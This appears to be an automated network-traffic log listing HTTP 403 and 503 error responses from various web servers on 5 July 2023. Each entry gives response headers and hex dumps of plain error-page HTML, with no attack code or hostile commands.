                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:09 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BXf4PKoT6/3nZmY3NmIxMzY5ZTRjOGU1ZjU0YzNhOTRmNWMxMjdj;Path=/X-Contextid: 57bgsQZS/hJ1FOX9KData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fmQMq9HkQhx1QF2uNCJ8NIK9tIo47ob%2BkFCaCXXzq1y36BBph8Emz0%2BEWyx%2FtJsgNVn7RgLiOqXK8N8eBP9GQXz3Rxd6R9yRjw9f6O6EbrEsJA8yAr0raspF3oXS2w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d1bb89e39e0-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 61 39 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 Data Ascii: 1a9c<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Conte
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:11 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 05 Jul 2023 06:07:11 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 05 Jul 2023 06:07:12 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 05 Jul 2023 06:07:12 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:12 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:16 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:18 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:18 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n7Pp6qVk3QQZDR1TwDNo6OvKa6aj9sbMW92zPkG%2FnlQN1%2BvhiktxUvfB6mrfszf3HykIKnIXB8hTlDi2vFWep3iQf%2FdKBWr4dieTt0D3uku4PaCoV7brgRfogzLPp88%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d4cbdd22c42-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:18 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AuBtLT0mpkEU6ncwDkolu%2BLVISwdemJNMM2aaI4l4vsgpmhsvOIH9kNXAyJcmkOVVsiRwQxA07cjo0lfEoqfOBkM4OdlAnE0EmFZ%2BmOKQNqhKNvko9VKxPA3R%2BA3Ih4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d4cee0f2c42-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:19 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BWwFRBEmdfXUOTgwNmQ1ZGQ0ODQxOWMyMDE2MTM2NDQ5NTZmMWU1;Path=/X-Contextid: ko5rDhzX/VUkn16XNData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 